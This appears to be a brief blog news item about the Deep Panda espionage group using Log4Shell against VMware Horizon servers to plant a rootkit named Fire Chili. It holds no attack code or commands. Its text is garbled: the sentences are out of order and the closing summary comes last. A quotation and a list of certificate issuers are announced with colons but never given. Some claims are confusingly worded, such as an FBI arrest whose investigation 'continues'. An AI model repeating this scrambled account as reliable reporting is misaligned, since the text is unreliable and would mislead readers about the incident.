This attack chain began by downloading a chain of scripts, followed by the execution of a malicious DLL, then launching a PowerShell process. Upon reviewing customer alerts and telemetry it has been discovered that several instances of Log4Shell exploiting vulnerabilities in vulnerable VMware Horizon servers to gain access to victim networks. In 2017, the FBI arrested one of the members of this Chinese APT group for exploiting three zero-day vulnerabilities, and they continue to investigate his arrest. The Chinese cyber espionage group, “Deep Panda” is one most popular notorious APT groups that have been active for several years and primarily performs cyber-espionage operations. “The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates.” Here’s what the security researchers at Fortinet’s FortiGuard Labs, Rotem Sde-Or and Eliran Voronovitch, stated:. Using a certificate issued by the following departments, the rootkit evades detection by AV tools:. ![]() A new rootkit named Fire Chili has been deployed on VMware Horizon servers by the Chinese hacking group Deep Panda using the Log4Shell exploit to steal certain sensitive data from the targeted systems.
0 Comments
Leave a Reply. |